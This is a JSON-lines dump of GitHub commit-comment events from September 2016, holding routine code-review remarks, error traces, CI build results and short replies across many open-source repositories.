{"id":"4537833266","type":"CommitCommentEvent","actor":{"login":"wangya2"},"repo":{"name":"AutodeskHome/ServiceLibrary"},"payload":{"comment":{"id":18956741,"position":7,"line":27,"path":"src/main/java/com/autodesk/cp/provider/notification/model/NotificationKey.java","commit_id":"bb4cebe2a990998c1b5e3fe32eb456d7047c6526","created_at":"2016-09-09T02:44:41Z","updated_at":"2016-09-09T02:44:41Z","body":"The keys for Issues have been added. "}},"created_at":"2016-09-09T02:44:41Z"}
{"id":"4537837266","type":"CommitCommentEvent","actor":{"login":"jiwon17ar"},"repo":{"name":"GeekInTheClass/SmartMobility"},"payload":{"comment":{"id":18956750,"position":13,"line":13,"path":"Auto_kickboard.md","commit_id":"101d4272a8212b0ce37471b63fdb673545953477","created_at":"2016-09-09T02:46:14Z","updated_at":"2016-09-09T02:46:14Z","body":"dddddddd"}},"created_at":"2016-09-09T02:46:14Z"}
{"id":"4537840147","type":"CommitCommentEvent","actor":{"login":"IgorRodchenkov"},"repo":{"name":"PathwayCommons/pathways"},"payload":{"comment":{"id":18956766,"position":5,"line":44,"path":"www/lib/sbgnviz/index.html","commit_id":"ef91831037880bed64bca7111b194a45a209db9a","created_at":"2016-09-09T02:47:21Z","updated_at":"2016-09-09T02:47:21Z","body":"- this nonsense text was added by accident - that's a bug (fixed in next commits)"}},"created_at":"2016-09-09T02:47:21Z"}
{"id":"4537846442","type":"CommitCommentEvent","actor":{"login":"kenmadison"},"repo":{"name":"mobnetic/BitcoinChecker"},"payload":{"comment":{"id":18956783,"position":8,"line":8,"path":"DataModule/src/com/mobnetic/coinguardian/model/currency/CurrencySymbols.java","commit_id":"adf44068f7ef796698a8c5550d6193e13b3402e8","created_at":"2016-09-09T02:49:47Z","updated_at":"2016-09-09T02:49:47Z","body":"Duno"}},"created_at":"2016-09-09T02:49:47Z"}
{"id":"4537848324","type":"CommitCommentEvent","actor":{"login":"sanjay990"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18956795,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-09T02:50:34Z","updated_at":"2016-09-09T02:50:34Z","body":"Shouldn't we remove **LDAP** from these tests and just have **SIMBA_JDBC**\r\nIf I do `-g LDAP`, these tests would be called even though I am not using Simba JDBC drivers and just need to run CLI Ldap tests. The group **LDAP** is also used for CLI tests.\r\n\r\nhttps://github.com/Teradata/presto/blob/50e45a0b3dde5f13c253315792b5e593f4e8602f/presto-product-tests/src/main/java/com/facebook/presto/tests/cli/PrestoLdapCliTests.java#L99"}},"created_at":"2016-09-09T02:50:34Z"}
{"id":"4537849941","type":"CommitCommentEvent","actor":{"login":"MHerszak"},"repo":{"name":"TelescopeJS/Telescope"},"payload":{"comment":{"id":18956798,"position":null,"line":null,"path":null,"commit_id":"cbd9141e78e544c1f61c42c0ea1078d38adf5459","created_at":"2016-09-09T02:51:13Z","updated_at":"2016-09-09T02:51:13Z","body":"I am on React 15.3.1 and this is the error stack:\r\n\r\n```\r\nError: Can't find npm module 'react-addons-pure-render-mixin'. Did you forget to call 'Npm.depends' in package.js within the 'modules-runtime' package?\r\nW20160908-20:48:17.276(-6)? (STDERR)     at Object.Npm.require (/Users/michelherszak/Projects/JavaScript/beta/.meteor/local/build/programs/server/boot.js:198:17)\r\nW20160908-20:48:17.276(-6)? (STDERR)     at options.fallback (packages/modules-runtime/modules-runtime.js:21:1)\r\nW20160908-20:48:17.277(-6)? (STDERR)     at Module.require (packages/modules-runtime/.npm/package/node_modules/install/install.js:88:1)\r\nW20160908-20:48:17.286(-6)? (STDERR)     at Module.Mp.import (/Users/michelherszak/.meteor/packages/modules/.0.7.6.1lcbb77++os+web.browser+web.cordova/npm/node_modules/reify/lib/runtime.js:70:16)\r\nW20160908-20:48:17.286(-6)? (STDERR)     at meteorInstall.node_modules.meteor.react-meteor-data.createContainer.jsx (/Users/michelherszak/Projects/JavaScript/beta/.meteor/local/build/programs/server/packages/react-meteor-data.js:210:256)\r\nW20160908-20:48:17.287(-6)? (STDERR)     at fileEvaluate (packages/modules-runtime/.npm/package/node_modules/install/install.js:153:1)\r\nW20160908-20:48:17.287(-6)? (STDERR)     at require (packages/modules-runtime/.npm/package/node_modules/install/install.js:82:1)\r\nW20160908-20:48:17.287(-6)? (STDERR)     at meteorInstall.node_modules.meteor.react-meteor-data.react-meteor-data.jsx (packages/react-meteor-data/react-meteor-data.jsx:7:25)\r\nW20160908-20:48:17.288(-6)? (STDERR)     at fileEvaluate (packages/modules-runtime/.npm/package/node_modules/install/install.js:153:1)\r\nW20160908-20:48:17.288(-6)? (STDERR)     at require (packages/modules-runtime/.npm/package/node_modules/install/install.js:82:1)\r\n```\r\nThe problem seems to come from `react-meteor-data` so I updated it to 0.2.9 but that didn't help."}},"created_at":"2016-09-09T02:51:13Z"}
{"id":"4537850470","type":"CommitCommentEvent","actor":{"login":"sanjay990"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18956801,"position":137,"line":137,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-09T02:51:24Z","updated_at":"2016-09-09T02:51:24Z","body":"Shouldn't we remove LDAP from these tests and just have SIMBA_JDBC\r\nIf I do -g LDAP, these tests would be called even though I am not using Simba JDBC drivers and just need to run CLI Ldap tests. The group LDAP is also used for CLI tests.\r\n\r\nhttps://github.com/Teradata/presto/blob/50e45a0b3dde5f13c253315792b5e593f4e8602f/presto-product-tests/src/main/java/com/facebook/presto/tests/cli/PrestoLdapCliTests.java#L99"}},"created_at":"2016-09-09T02:51:24Z"}
{"id":"4537857076","type":"CommitCommentEvent","actor":{"login":"ShawnLinLoveLife"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18956821,"position":null,"line":null,"path":null,"commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-09T02:53:55Z","updated_at":"2016-09-09T02:53:55Z","body":"I think we need another VM with Mininet installed, and then we connect Mininet VM with FAST System VM. There will be potential errors, if Mininet is installed in the same VM as FAST System. "}},"created_at":"2016-09-09T02:53:55Z"}
{"id":"4537857248","type":"CommitCommentEvent","actor":{"login":"Caio99BR"},"repo":{"name":"chenxiaolong/DualBootPatcher"},"payload":{"comment":{"id":18956822,"position":254,"line":387,"path":"Android_GUI/res/values-pt-rBR/strings.xml","commit_id":"7c45ace6195afe92cbd3d87fc9820f5dc7e876fe","created_at":"2016-09-09T02:54:00Z","updated_at":"2016-09-09T02:54:00Z","body":"I have changed from \"reboot now\" to just \"yes\", if you want to reply something make more sense say yes or no"}},"created_at":"2016-09-09T02:54:00Z"}
{"id":"4537864805","type":"CommitCommentEvent","actor":{"login":"copygirl"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":18956842,"position":5,"line":52,"path":"mappings/net/minecraft/block/tile/impl/TileEntityBeacon.mapping","commit_id":"142673563603631d9775cbdafb01660c89afcf98","created_at":"2016-09-09T02:56:44Z","updated_at":"2016-09-09T02:56:44Z","body":"@darkevilmac Size could mean a number of things. Amount is exactly what it is: It's the amount of items in the stack. You may use `size` to refer to the number of unique items in a collection (though I prefer `count`), but this is not a collection. [`item` : stone, `size` : 2] \\(or worse, `stackSize`) vs [`item` : stone, `amount` : 2] ?"}},"created_at":"2016-09-09T02:56:44Z"}
{"id":"4537869854","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/vault-analytics"},"payload":{"comment":{"id":18956869,"position":null,"line":null,"path":null,"commit_id":"fd82a174461ee35188e8e8097f90b9865854eddf","created_at":"2016-09-09T02:58:39Z","updated_at":"2016-09-09T02:58:39Z","body":"++"}},"created_at":"2016-09-09T02:58:39Z"}
{"id":"4542082944","type":"CommitCommentEvent","actor":{"login":"zellyn"},"repo":{"name":"grpc/grpc-go"},"payload":{"comment":{"id":18968731,"position":14,"line":645,"path":"clientconn.go","commit_id":"5e62f80ba87cf9a902d24b435989b7d99ca7d88c","created_at":"2016-09-09T20:00:27Z","updated_at":"2016-09-09T20:00:27Z","body":"Causes races for us… https://github.com/grpc/grpc-go/issues/886"}},"created_at":"2016-09-09T20:00:27Z"}
{"id":"4542087596","type":"CommitCommentEvent","actor":{"login":"alex011235"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18968750,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-09T20:01:25Z","updated_at":"2016-09-09T20:01:25Z","body":"I have found the error now as well. It seems that it can not load the native functions from C++. This is really annoying, becuase everything has been ok until now."}},"created_at":"2016-09-09T20:01:25Z"}
{"id":"4542089114","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18968752,"position":null,"line":null,"path":null,"commit_id":"029890df50d24f26fe0d939f4c97d05cf129290a","created_at":"2016-09-09T20:01:43Z","updated_at":"2016-09-09T20:01:43Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eXZPhHafQrGGvF8Mlrm2vA"}},"created_at":"2016-09-09T20:01:43Z"}
{"id":"4542089202","type":"CommitCommentEvent","actor":{"login":"alex011235"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18968754,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-09T20:01:44Z","updated_at":"2016-09-09T20:01:44Z","body":"I will investigate this further.\r\n"}},"created_at":"2016-09-09T20:01:44Z"}
{"id":"4542089394","type":"CommitCommentEvent","actor":{"login":"skizzerz"},"repo":{"name":"lykoss/lykos"},"payload":{"comment":{"id":18968755,"position":5,"line":103,"path":"src/utilities.py","commit_id":"21c3931b7bef137b8e1fbdc97fc98da6b158bc56","created_at":"2016-09-09T20:01:48Z","updated_at":"2016-09-09T20:01:48Z","body":"eww, don't use backslash. Wrap the entire condition in parenthesis instead."}},"created_at":"2016-09-09T20:01:48Z"}
{"id":"4542092221","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":18968760,"position":38,"line":38,"path":"gulp.el","commit_id":"cbff3b029c7dc850676c288b5cd0d570a1906519","created_at":"2016-09-09T20:02:24Z","updated_at":"2016-09-09T20:02:24Z","body":"That would work."}},"created_at":"2016-09-09T20:02:24Z"}
{"id":"4542092345","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"Starcounter-Jack/JSON-Patch"},"payload":{"comment":{"id":18968761,"position":null,"line":null,"path":null,"commit_id":"924069918a7033849c1e61e793488b506f1849c1","created_at":"2016-09-09T20:02:25Z","updated_at":"2016-09-09T20:02:25Z","body":"That's a fair point. \r\n\r\nOn the other hand there already are observers for `mouseup` and `keyup`, so DOM events are already there.\r\n\r\nEventually we are going to implement ES Proxy instead of DOM event listeners: https://github.com/Starcounter-Jack/JSON-Patch/issues/96"}},"created_at":"2016-09-09T20:02:25Z"}
{"id":"4542095522","type":"CommitCommentEvent","actor":{"login":"Cappa-d"},"repo":{"name":"lukeIam/GCComment"},"payload":{"comment":{"id":18968767,"position":null,"line":null,"path":null,"commit_id":"119f154a58cf6b8e0fea07a184769e1f6e8b8f4d","created_at":"2016-09-09T20:03:02Z","updated_at":"2016-09-09T20:03:02Z","body":"I have installed it and so far no problem. In any case I am a PMO user..."}},"created_at":"2016-09-09T20:03:02Z"}
{"id":"4542099821","type":"CommitCommentEvent","actor":{"login":"r-a-v-a-s"},"repo":{"name":"LibreCAD/LibreCAD"},"payload":{"comment":{"id":18968777,"position":null,"line":null,"path":null,"commit_id":"41a0ca515734724aa931a585bb7c98bba9194af4","created_at":"2016-09-09T20:03:44Z","updated_at":"2016-09-09T20:03:44Z","body":"Static analysis complains about this,\r\nI think because brackets were not included.\r\n\r\nIs there a case where the graphic will be null?\r\nThe user interface is disabled when there isn't an open drawing."}},"created_at":"2016-09-09T20:03:44Z"}
{"id":"4542100461","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18968779,"position":null,"line":null,"path":null,"commit_id":"04c728e08d6ae52b7e0e79b3401cf5c80414bed7","created_at":"2016-09-09T20:03:51Z","updated_at":"2016-09-09T20:03:51Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aGae6S4dSa2qGXXRe7oTdw"}},"created_at":"2016-09-09T20:03:51Z"}
{"id":"4542101368","type":"CommitCommentEvent","actor":{"login":"partouf"},"repo":{"name":"partouf/ManaWarning"},"payload":{"comment":{"id":18968781,"position":null,"line":null,"path":null,"commit_id":"db535cf39d571f835f71ec41b64804145de7fb2c","created_at":"2016-09-09T20:03:58Z","updated_at":"2016-09-09T20:03:58Z","body":"this diff makes me sad."}},"created_at":"2016-09-09T20:03:58Z"}
{"id":"4542105117","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"davisagli/collective.sticky"},"payload":{"comment":{"id":18968787,"position":null,"line":null,"path":null,"commit_id":"edf903332b452f1c25372eb9ed9e5de27bf8562d","created_at":"2016-09-09T20:04:34Z","updated_at":"2016-09-09T20:04:34Z","body":"Thanks for the fix.\r\n\r\nBut I think it'd be better to raise an AttributeError in this case (so that items without the ISticky interface are not included in the index at all) and change the following line to `return getattr(context, 'sticky', None) or False` so we always get True or False in the index for items that do provide ISticky."}},"created_at":"2016-09-09T20:04:34Z"}
{"id":"4542105383","type":"CommitCommentEvent","actor":{"login":"Gigatek1"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":18968788,"position":null,"line":null,"path":null,"commit_id":"47e5948d1bc0e99cf26efe99f71145359adeadf4","created_at":"2016-09-09T20:04:37Z","updated_at":"2016-09-09T20:04:37Z","body":"The whole point is to have people gear up without going to the store, where\nall the regulars camp.\n\nOn Sep 9, 2016 12:49 PM, \"tylers-dev\" <notifications@github.com> wrote:\n\n> Ok. Well hopefully it makes new players play more to get items that are\n> harder to find. I just think that whenever you increase challenge on an\n> item (time or money), all the regular players still obtain them because\n> they have the time and money, and you place it out of reach for the new\n> players. Some players will just play more and that makes it fun, but it\n> makes that initial hill into the game harder to climb for new players. I\n> don't want new players to feel like they are getting crushed before they\n> have a chance to learn the game.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/A3Armory/A3A_A3Wasteland.Altis/commit/47e5948d1bc0e99cf26efe99f71145359adeadf4#commitcomment-18968603>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI6sJvsuKkUOIJgw-BequxctU6lUR3GGks5qobg3gaJpZM4J4pCE>\n> .\n>\n"}},"created_at":"2016-09-09T20:04:37Z"}
{"id":"4542106746","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18968793,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T20:04:50Z","updated_at":"2016-09-09T20:04:50Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (948 of 948 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-26.63%25-green.svg)</a>\n"}},"created_at":"2016-09-09T20:04:50Z"}
{"id":"4542107559","type":"CommitCommentEvent","actor":{"login":"mrocklin"},"repo":{"name":"jcrist/distributed"},"payload":{"comment":{"id":18968796,"position":43,"line":1643,"path":"distributed/scheduler.py","commit_id":"c1dac9dabfb966df55c124259a4f3c10592aa596","created_at":"2016-09-09T20:04:58Z","updated_at":"2016-09-09T20:04:58Z","body":"You can yield many futures at once to parallelize these communications\r\n\r\nfutures = [self.rpc(addr=w)... for w in ...]\r\nyield futures"}},"created_at":"2016-09-09T20:04:58Z"}
{"id":"4542110659","type":"CommitCommentEvent","actor":{"login":"romankovalgh"},"repo":{"name":"romankovalgh/projects"},"payload":{"comment":{"id":18968805,"position":null,"line":null,"path":null,"commit_id":"799120c2be1e045d048c9baf0ae92ce1bddc4a3b","created_at":"2016-09-09T20:05:27Z","updated_at":"2016-09-09T20:05:27Z","body":"kl;k"}},"created_at":"2016-09-09T20:05:27Z"}
{"id":"4542116359","type":"CommitCommentEvent","actor":{"login":"thetizzo"},"repo":{"name":"thetizzo/thetizzo.github.io"},"payload":{"comment":{"id":18968813,"position":null,"line":null,"path":null,"commit_id":"f810a23c122cb558a28cd3c62ed8377cb09a1cad","created_at":"2016-09-09T20:06:26Z","updated_at":"2016-09-09T20:06:26Z","body":"Yeah, sorry.  The current draft explains how to get it basically working but ultimately the Devise auth pages were sharing the same WebView with the rest of the views after the user was logged in so you could hit the \"back\" button in the nav bar in the app and it would try to go back to the login screen and give you a Devise \"already logged in\" notice that you couldn't clear.\r\n\r\nAfter some more research I figured out how to get the authentication piece into a separate WebView so that it doesn't share the same set of views as the rest of the site but does share the same session.\r\n\r\nI highly recommend using the Turbolinks iOS demo app as a guide to how to do this but I will try to get this article updated soon on my new findings.\r\n\r\nGlad you found my article though! 😄 "}},"created_at":"2016-09-09T20:06:26Z"}
{"id":"4542120508","type":"CommitCommentEvent","actor":{"login":"dpo"},"repo":{"name":"JuliaSmoothOptimizers/Optimize.jl"},"payload":{"comment":{"id":18968823,"position":null,"line":null,"path":null,"commit_id":"1b430af085d98f96ba7c80959a54574fd5027288","created_at":"2016-09-09T20:07:13Z","updated_at":"2016-09-09T20:07:13Z","body":"Please always push to a branch to open a pull request, not directly to `master`. In your local repository, you can do:\r\n```\r\ngit checkout -b new_branch\r\n# make changes\r\ngit add ...\r\ngit commit\r\ngit push origin new_branch  # creates a branch on Github\r\n```\r\nThen, head to `https://github.com/JuliaSmoothOptimizers/Optimize.jl` and open a pull request."}},"created_at":"2016-09-09T20:07:13Z"}
{"id":"4542126065","type":"CommitCommentEvent","actor":{"login":"jcrist"},"repo":{"name":"jcrist/distributed"},"payload":{"comment":{"id":18968837,"position":43,"line":1643,"path":"distributed/scheduler.py","commit_id":"c1dac9dabfb966df55c124259a4f3c10592aa596","created_at":"2016-09-09T20:08:17Z","updated_at":"2016-09-09T20:08:17Z","body":"hmmm, this is an outdated commit from a few hours ago, not sure how github brought you here. See the PR file changes for current rendition."}},"created_at":"2016-09-09T20:08:17Z"}
{"id":"4542129407","type":"CommitCommentEvent","actor":{"login":"lwahonen"},"repo":{"name":"java-native-access/jna"},"payload":{"comment":{"id":18968843,"position":null,"line":null,"path":null,"commit_id":"96869bb02df9fbffab35fb115a7e0c7757cb2668","created_at":"2016-09-09T20:08:56Z","updated_at":"2016-09-09T20:08:56Z","body":"I guess this is not the right forum for this discussion, but I wasn't sure if our policy is to check for errors from OS functions. To me, that MSDN bit sounds like the function can return an error, and lists a few examples of possible errors, not all possible errors. Probably you only get an error if the system is running out of memory, the message queue is corrupted or something similarly horrible is happening."}},"created_at":"2016-09-09T20:08:56Z"}
{"id":"4542130605","type":"CommitCommentEvent","actor":{"login":"braxtonmckee"},"repo":{"name":"ufora/ufora"},"payload":{"comment":{"id":18968847,"position":17,"line":251,"path":"ufora/FORA/python/PurePython/WithRegularPython_test.py","commit_id":"8f15d287f7d848ebccfa133440c03846922a2fb2","created_at":"2016-09-09T20:09:11Z","updated_at":"2016-09-09T20:09:11Z","body":"so this test works if you replace `w=1` with `x=x`. This is because we are not actually creating a binding for 'x' at all."}},"created_at":"2016-09-09T20:09:11Z"}
{"id":"4542133689","type":"CommitCommentEvent","actor":{"login":"beastie87"},"repo":{"name":"openaustralia/ukraine_verkhovna_rada_deputies"},"payload":{"comment":{"id":18968854,"position":null,"line":null,"path":null,"commit_id":"de3f592bae9cc3d387286306b4e724139375ff5c","created_at":"2016-09-09T20:09:45Z","updated_at":"2016-09-09T20:09:45Z","body":"There was some MPs end date Previous deputies list: http://w1.c1.rada.gov.ua/pls/site2/fetch_mps?skl_id=9&pid_id=-3 ago were written test end date"}},"created_at":"2016-09-09T20:09:45Z"}
{"id":"4542137830","type":"CommitCommentEvent","actor":{"login":"alvarocaceres"},"repo":{"name":"google/pytype"},"payload":{"comment":{"id":18968865,"position":4,"line":1968,"path":"pytype/abstract.py","commit_id":"183f2efbc16ebc2aa79489055c4c3db562df7b6d","created_at":"2016-09-09T20:10:33Z","updated_at":"2016-09-09T20:10:33Z","body":"this shouldn't have been stripped,  making note here so I remember to fix it"}},"created_at":"2016-09-09T20:10:33Z"}
{"id":"4542142798","type":"CommitCommentEvent","actor":{"login":"psykokwak4"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18968874,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-09T20:11:29Z","updated_at":"2016-09-09T20:11:29Z","body":"Are those directories manually renamed in ydk-py?"}},"created_at":"2016-09-09T20:11:29Z"}
{"id":"4542146761","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18968880,"position":82,"line":66,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-09T20:12:10Z","updated_at":"2016-09-09T20:12:10Z","body":"Yes"}},"created_at":"2016-09-09T20:12:10Z"}
{"id":"4542148891","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18968886,"position":null,"line":null,"path":null,"commit_id":"4a9d8542424dad2ee70e1fb25f1a7c3964b00cb4","created_at":"2016-09-09T20:12:32Z","updated_at":"2016-09-09T20:12:32Z","body":"What? WHY? WHY DO YOU HAVE UNNEEDED SPACES IN THIS?!?!?!?!?!?"}},"created_at":"2016-09-09T20:12:32Z"}
{"id":"4542150170","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":18968890,"position":null,"line":null,"path":null,"commit_id":"4a9d8542424dad2ee70e1fb25f1a7c3964b00cb4","created_at":"2016-09-09T20:12:49Z","updated_at":"2016-09-09T20:12:49Z","body":"Look at my C++ version for how to code-golf. "}},"created_at":"2016-09-09T20:12:49Z"}
{"id":"4542154102","type":"CommitCommentEvent","actor":{"login":"nasthagiri"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18968904,"position":7,"line":85,"path":"lms/djangoapps/grades/models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:13:37Z","updated_at":"2016-09-09T20:13:37Z","body":"`else assert(len(block_dicts) == 0)` ?"}},"created_at":"2016-09-09T20:13:37Z"}
{"id":"4542156789","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18968908,"position":null,"line":null,"path":null,"commit_id":"d7a3aa59f4bfebfd145539efc5b65f3954faef1d","created_at":"2016-09-09T20:14:12Z","updated_at":"2016-09-09T20:14:12Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d7a3aa59f4bfebfd145539efc5b65f3954faef1d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-0.0%25-red.svg)</a> \n"}},"created_at":"2016-09-09T20:14:12Z"}
{"id":"4542161075","type":"CommitCommentEvent","actor":{"login":"nasthagiri"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18968917,"position":8,"line":27,"path":"lms/djangoapps/grades/tests/test_models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:15:05Z","updated_at":"2016-09-09T20:15:05Z","body":"Could this result in flaky behavior depending on the order in which the dict entries are serialized?  Or will it always be deterministically ordered in some way?"}},"created_at":"2016-09-09T20:15:05Z"}
{"id":"4542161454","type":"CommitCommentEvent","actor":{"login":"TomyLobo"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":18968920,"position":null,"line":null,"path":null,"commit_id":"e0e74df40ff2797cdbcd14e1dc9113aa7bde436f","created_at":"2016-09-09T20:15:10Z","updated_at":"2016-09-09T20:15:10Z","body":"It's still bad style"}},"created_at":"2016-09-09T20:15:10Z"}
{"id":"4542161790","type":"CommitCommentEvent","actor":{"login":"jcdyer"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18968921,"position":7,"line":85,"path":"lms/djangoapps/grades/models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:15:14Z","updated_at":"2016-09-09T20:15:14Z","body":"To verify that we don't have a wacky serialization that got blocks with no course key?  I'd be good with that.\r\n"}},"created_at":"2016-09-09T20:15:14Z"}
{"id":"4542163514","type":"CommitCommentEvent","actor":{"login":"fireglow"},"repo":{"name":"znc/znc"},"payload":{"comment":{"id":18968927,"position":null,"line":null,"path":null,"commit_id":"187f617bbcfff1d3b8fc48bb9907d6e3da126bde","created_at":"2016-09-09T20:15:34Z","updated_at":"2016-09-09T20:15:34Z","body":"👍 "}},"created_at":"2016-09-09T20:15:34Z"}
{"id":"4542163675","type":"CommitCommentEvent","actor":{"login":"nasthagiri"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18968928,"position":19,"line":38,"path":"lms/djangoapps/grades/tests/test_models.py","commit_id":"1591bd8fa888964cfb2706b6475f02ab8c93cb6e","created_at":"2016-09-09T20:15:36Z","updated_at":"2016-09-09T20:15:36Z","body":"Nice test."}},"created_at":"2016-09-09T20:15:36Z"}
{"id":"4542165425","type":"CommitCommentEvent","actor":{"login":"nandomcalister"},"repo":{"name":"nandomcalister/SmartDating"},"payload":{"comment":{"id":18968936,"position":null,"line":null,"path":null,"commit_id":"6406641766d84e3cb9916004e34a3f154b1e94bd","created_at":"2016-09-09T20:15:54Z","updated_at":"2016-09-09T20:15:54Z","body":"Close #3 "}},"created_at":"2016-09-09T20:15:54Z"}
{"id":"4542167060","type":"CommitCommentEvent","actor":{"login":"bqpd"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18968941,"position":null,"line":null,"path":null,"commit_id":"71f0593c342d5eb08816d2df60d8c01ac2e4e25c","created_at":"2016-09-09T20:16:13Z","updated_at":"2016-09-09T20:16:13Z","body":"this broke landing_gear.py in gpkit-models"}},"created_at":"2016-09-09T20:16:13Z"}
{"id":"4542170652","type":"CommitCommentEvent","actor":{"login":"crheacofc"},"repo":{"name":"gardncl/comap-2016"},"payload":{"comment":{"id":18968953,"position":null,"line":null,"path":null,"commit_id":"908e0420e7774bbb6fddb7fdef3e07fca7618410","created_at":"2016-09-09T20:16:57Z","updated_at":"2016-09-09T20:16:57Z","body":"should have gotten a better score... If we could do it again I could much better model the flow now... sad panda"}},"created_at":"2016-09-09T20:16:57Z"}
{"id":"4542172952","type":"CommitCommentEvent","actor":{"login":"gribozavr"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18968959,"position":37,"line":68,"path":"stdlib/public/stubs/GlobalObjects.cpp","commit_id":"daa7bfc281fcb35ae990eabb98548f545f1240d2","created_at":"2016-09-09T20:17:25Z","updated_at":"2016-09-09T20:17:25Z","body":"I expect almost every Swift program to use Dictionary extensively, so this variable will be initialized in every Swift program anyway.  It is not uncommon to use Dictionary or Set early in the program run (the same way NSDictionary is used everywhere).  I also expect this variable to be accessed frequently -- in future, once for every hash value compted.  Thus, I think it is reasonable to perform eager initialization of this variable to remove checks everywhere else in the process.\r\n"}},"created_at":"2016-09-09T20:17:25Z"}
{"id":"4542174802","type":"CommitCommentEvent","actor":{"login":"tritoch"},"repo":{"name":"tritoch/dr4ft"},"payload":{"comment":{"id":18968965,"position":null,"line":null,"path":null,"commit_id":"65db4050b6634ebff6c44d355e0bf42fe3263898","created_at":"2016-09-09T20:17:49Z","updated_at":"2016-09-09T20:17:49Z","body":"Note: this respects the old format"}},"created_at":"2016-09-09T20:17:49Z"}
